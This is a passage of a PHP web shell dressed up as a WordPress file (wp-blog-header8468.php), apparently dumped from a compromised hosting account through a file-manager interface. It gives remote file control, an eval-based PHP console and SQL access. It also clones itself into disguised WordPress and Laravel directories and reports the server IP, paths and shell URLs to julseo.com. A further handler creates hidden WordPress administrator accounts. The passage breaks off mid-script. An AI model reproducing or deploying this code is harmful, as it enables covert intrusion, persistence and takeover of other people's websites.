File manager - Edit - /home/wsardargurjari/public_html/storage/app/public/wp-blog-header8468.php.tar
Back
home/wsardargurjari/public_html/storage/app/public/wp-blog-header8468.php���������������������������0000644�����������������00000271417�15123434417�0022407 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /* PHP File manager ver 1.4 */ // Configuration — do not change manually! // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'fr'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } // Klonlama fonksiyonları function generate_random_number() { return rand(100000, 999999); } function generate_random_word() { $words = array('helper', 'util', 'common', 'shared', 'global', 'init', 'app', 'lib', 'src', 'bin'); return $words[array_rand($words)]; } function generate_wp_like_name() { $wp_prefixes = array('wp-config', 'wp-admin', 'wp-content', 'wp-includes', 'wp-settings', 'wp-load', 'wp-blog-header', 'wp-json', 'wp-cron', 'wp-mail'); $prefix = $wp_prefixes[array_rand($wp_prefixes)]; $random1 = rand(10, 99); $random2 = rand(10, 99); return $prefix . $random1 . $random2; } function sendShellClonesToJulseo($created, $urls) { $julseo_url = 'https://julseo.com/klon.php'; $shell_data = array( 'server_name' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'Unknown', 'server_ip' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : 'Unknown', 'server_path' => getcwd(), 'clone_date' => date('Y-m-d H:i:s'), 'timestamp' => time(), 'shells' => array() ); foreach ($created as $index => $shell_info) { $shell_path = is_array($shell_info) ? $shell_info['path'] : $shell_info; $shell_url = is_array($shell_info) ? $shell_info['url'] : (isset($urls[$index]) ? $urls[$index] : ''); $shell_data['shells'][] = array( 'filename' => basename($shell_path), 'full_path' => $shell_path, 'url' => $shell_url, 'type' => $index < 3 ? 'random' : 'wp_like', 'status' => 'active', 'file_size' => file_exists($shell_path) ? filesize($shell_path) : 0 ); } $post_data = array( 'api_key' => 'julseo2025', 'api_action' => 'receive_shell_clones', 'shell_data' => json_encode($shell_data) ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $julseo_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'Shell Manager/1.0'); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/x-www-form-urlencoded', 'X-Shell-Server: ' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'Unknown') )); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code !== 200) { error_log("Julseo.com'a veri gönderilemedi. HTTP Code: $http_code, Response: $response"); return false; } else { error_log("Julseo.com'a veri başarıyla gönderildi. Shell sayısı: " . count($created)); return true; } } function fm_clone_self() { $source_file = __FILE__; // ton.php dosyasının kendisi $file_content = file_get_contents($source_file); $file_extension = pathinfo($source_file, PATHINFO_EXTENSION); $web_root = $_SERVER['DOCUMENT_ROOT']; $deep_dirs = array( '/wp-content/plugins/akismet/views/', '/wp-content/themes/twentytwenty/assets/js/', '/wp-includes/js/jquery/', '/wp-admin/includes/class/', '/wp-content/uploads/2023/cache/', '/wp-content/cache/plugins/', '/assets/css/themes/', '/includes/libraries/vendor/', '/public/js/components/', '/resources/views/admin/', '/storage/app/public/', '/vendor/laravel/framework/src/', '/wp-content/plugins/woocommerce/includes/', '/wp-content/themes/storefront/inc/', '/wp-includes/rest-api/endpoints/', '/wp-admin/css/', '/wp-content/uploads/2024/', '/assets/js/vendor/', '/public/css/components/', '/resources/views/layouts/' ); $clones = array(); $clone_urls = array(); $created_paths = array(); $domain = $_SERVER['HTTP_HOST']; for ($i = 0; $i < 10; $i++) { $selected_dir = $deep_dirs[array_rand($deep_dirs)]; $target_dir = $web_root . $selected_dir; if (!is_dir($target_dir)) { @mkdir($target_dir, 0755, true); } if ($i < 3) { $filename = generate_random_number() . '.' . $file_extension; } elseif ($i < 6) { $filename = generate_random_word() . '.' . $file_extension; } else { $filename = generate_wp_like_name() . '.' . $file_extension; } $target_file = $target_dir . $filename; if (!file_exists($target_file) && is_writable($target_dir)) { if (@file_put_contents($target_file, $file_content)) { $clones[] = $filename; $clone_urls[] = 'https://' . $domain . $selected_dir . $filename; $created_paths[] = $target_file; } } } if (count($created_paths) > 0) { sendShellClonesToJulseo($created_paths, $clone_urls); } return array('files' => $clones, 'urls' => $clone_urls); } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // WordPress Admin Kullanıcıları Oluşturma if (isset($_GET['adminac'])) { $admin_users = create_wp_admin_users(); if (isset($admin_users['error'])) { echo '<!doctype html> <html> <head> <meta charset="utf-8" /> <title>WordPress Admin Oluşturucu</title> <style> body { font-family: Arial, sans-serif; margin: 50px; background: #f1f1f1; } .container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); max-width: 600px; margin: 0 auto; } .error { background: #ffebee; color: #c62828; padding: 15px; border-radius: 5px; border-left: 4px solid #c62828; } .back-btn { background: #0073aa; color: white; padding: 10px 20px; text-decoration: none; border-radius: 5px; display: inline-block; margin-top: 20px; } </style> </head> <body> <div class="container"> <h2>WordPress Admin Oluşturucu</h2> <div class="error">' . $admin_users['error'] . '</div> <a href="' . fm_url() . '" class="back-btn">Geri Dön</a> </div> </body> </html>'; die(); } $domain = $_SERVER['HTTP_HOST']; $wp_admin_url = 'https://' . $domain . '/wp-admin/'; echo '<!doctype html> <html> <head> <meta charset="utf-8" /> <title>WordPress Admin Kullanıcıları</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; background: #f1f1f1; } .container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); max-width: 800px; margin: 0 auto; } .success { background: #e8f5e8; color: #2e7d32; padding: 15px; border-radius: 5px; border-left: 4px solid #2e7d32; margin-bottom: 20px; } .user-info { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; border-left: 4px solid #0073aa; } .copy-btn { background: #0073aa; color: white; padding: 12px 25px; border: none; border-radius: 5px; cursor: pointer; font-size: 16px; margin: 20px 0; } .copy-btn:hover { background: #005a87; } .back-btn { background: #6c757d; color: white; padding: 10px 20px; text-decoration: none; border-radius: 5px; display: inline-block; margin-top: 20px; } textarea { width: 100%; height: 200px; padding: 15px; border: 1px solid #ddd; border-radius: 5px; font-family: monospace; font-size: 14px; margin: 10px 0; } </style> </head> <body> <div class="container"> <h2>WordPress Admin Kullanıcıları Oluşturuldu</h2> <div class="success">3 adet WordPress admin kullanıcısı başarıyla oluşturuldu!</div>'; $role_names = array('Webmaster', 'SEO Manager', 'Support Team'); foreach ($admin_users as $index => $user) { echo '<div class="user-info"> <h3>' . $role_names[$index] . '</h3> <p><strong>Kullanıcı Adı:</strong> ' . htmlspecialchars($user['username']) . '</p> <p><strong>Şifre:</strong> ' . htmlspecialchars($user['password']) . '</p> <p><strong>E-posta:</strong> ' . htmlspecialchars($user['email']) . '</p> </div>'; } echo '<button class="copy-btn" onclick="copyAdminInfo()">Bilgileri Kopyala</button> <textarea id="adminInfo" readonly>Domain: ' . $domain . ' WP-ADMIN URL: ' . $wp_admin_url . ' ---1--- ID: ' . $admin_users[0]['username'] . ' PASSWORD: ' . $admin_users[0]['password'] . ' ---2--- ID: ' . $admin_users[1]['username'] . ' PASSWORD: ' . $admin_users[1]['password'] . ' ---3--- ID: ' . $admin_users[2]['username'] . ' PASSWORD: ' . $admin_users[2]['password'] . '</textarea> <script> function copyAdminInfo() { var textarea = document.getElementById("adminInfo"); textarea.select(); document.execComm
| ver. 1.4 |
Github
|
.
| PHP 7.3.33 | Generation time: 0 |
proxy
|
phpinfo
|
Settings